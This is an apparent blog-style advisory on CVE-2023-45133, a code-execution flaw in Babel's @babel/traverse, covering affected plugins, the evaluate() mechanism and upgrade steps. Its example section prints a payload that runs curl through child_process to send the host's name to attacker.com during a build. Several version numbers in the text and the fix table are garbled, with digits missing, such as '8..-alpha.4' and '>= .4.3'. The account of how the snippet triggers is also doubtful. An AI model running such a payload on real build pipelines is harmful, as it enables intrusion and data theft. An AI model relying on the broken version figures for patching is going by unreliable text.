Babel is a cornerstone project in the JavaScript ecosystem, letting developers write modern JavaScript and compile it to be compatible with older environments. But like any widely adopted tool, it’s not immune to critical vulnerabilities. In late 2023, a serious issue, now tracked as CVE-2023-45133, was discovered within Babel’s code traversal utilities. This vulnerability allows attackers to execute arbitrary code on a developer’s machine during the build phase – simply by getting a developer to compile malicious JavaScript.
Let's break down what this means, how it happens, and what you should do to stay protected.
What Is CVE-2023-45133?
CVE-2023-45133 is a vulnerability in @babel/traverse (before versions 7.23.2 and 8..-alpha.4) and all versions of the babel-traverse package. The bug is trigged when certain Babel plugins compile attacker-controlled code. If you use Babel plugins like @babel/plugin-transform-runtime or @babel/preset-env (with the useBuiltIns option), and your build process consumes untrusted code, you could be at risk of an attacker compromising your system, CI runners, or deployment pipeline.
#### TL;DR: If you or your build process Babel-compiles code from untrusted sources and use any of the affected plugins, you could run arbitrary code hidden inside that JavaScript. If you only compile your own code or packages you trust, you're not at risk.
Why Is This Dangerous?
The crux of the issue is the misuse of Babel’s internal code evaluation helpers, particularly path.evaluate() and path.evaluateTruthy(). These are meant for safe analysis of code, not for running arbitrary JavaScript. If an attacker can get carefully crafted code passed through an affected Babel plugin, their payload can execute in your build environment.
In Real Life
Smoke test builds, CI pipelines, monorepos – any setup where source code from outside contributors is compiled using Babel with affected plugins is open to attack.
Vulnerable Babel packages:
- @babel/traverse versions prior to 7.23.2 or 8..-alpha.4
- AND any of these plugins
- @babel/plugin-transform-runtime
- @babel/preset-env with theuseBuiltIns option
- @babel/helper-define-polyfill-provider
Example: Exploiting the Vulnerability
Below is an example exploit snippet that could be included in an open source pull request, causing remote code execution when compiled by a vulnerable Babel setup with affected plugins:
// attacker-payload.js
Object.defineProperty(globalThis, "SOME_FAKE_GLOBAL", {
get() {
// This code runs during compilation via path.evaluate()
require('child_process').execSync('curl -X POST http://attacker.com/yourip='+(require("os").hostname()));
return 123;
}
});
const x = SOME_FAKE_GLOBAL + 1;
Add this line to any codebase processed by a misconfigured (vulnerable) Babel setup and attacker-supplied code executes instantly upon build.
How Does the Exploit Work?
Affected Babel plugins internally try to evaluate code during the compilation phase to optimize polyfills. If they use path.evaluate() on attacker-crafted properties with malicious getters, that JavaScript is actually *executed* — right on the build system. No user interaction, no runtime code needed! All via "safe" code analysis.
How To Fix
Patch your @babel/traverse dependency—even if you only reference plugins! These plugins depend on @babel/traverse under the hood.
Upgrade these packages ASAP
| Package | Safe Version |
|---------------------------------------|--------------------------|
| @babel/traverse | >= 7.23.2, 8..-alpha.4 |
| babel-traverse | *(DEPRECATED)* |
| @babel/plugin-transform-runtime | >= 7.23.2 |
| @babel/preset-env | >= 7.23.2 |
| @babel/helper-define-polyfill-provider| >= .4.3 |
| babel-plugin-polyfill-corejs2 | >= .4.6 |
| babel-plugin-polyfill-corejs3 | >= .8.5 |
| babel-plugin-polyfill-es-shims | >= .10. |
| babel-plugin-polyfill-regenerator | >= .5.3 |
Upgrading example
npm install @babel/traverse@^7.23.2 @babel/preset-env@^7.23.2
# (repeat for the other plugins if used)
or via yarn
yarn upgrade @babel/traverse@^7.23.2
Should You Worry?
- YEP: If you run Babel over contributed, unknown, or third-party code in CI/CD or other automated build environments.
Further Reading and References
- Official Babel Security Advisory - CVE-2023-45133
- Original GitHub Issue Discussion
- npm advisory: Arbitrary code execution in @babel/traverse
- NVD Entry for CVE-2023-45133
Summary Table
| Mitigation Step | Required For... |
|-----------------------------------|--------------------------------|
| Upgrade Babel packages/plugins | Anyone using affected plugins |
| Never compile untrusted code | Everyone (best practice) |
| Review custom or third-party plugins | Plugin authors and maintainers |
Final Thoughts
Babel has patched this critical issue, but the supply chain is only as strong as its weakest link. Always audit your dependencies, use lockfiles, and update regularly. If you handle third-party or open source code at build time, take this seriously. Stay safe and patch your pipeline!
*This post written for educational purposes. Always test updates in a safe environment before rolling out to production.*
*If you believe you may have been affected by this vulnerability, or need tailored remediation advice, consult the official links or your security team immediately.*
Timeline
Published on: 10/12/2023 17:15:09 UTC
Last modified on: 10/24/2023 16:52:20 UTC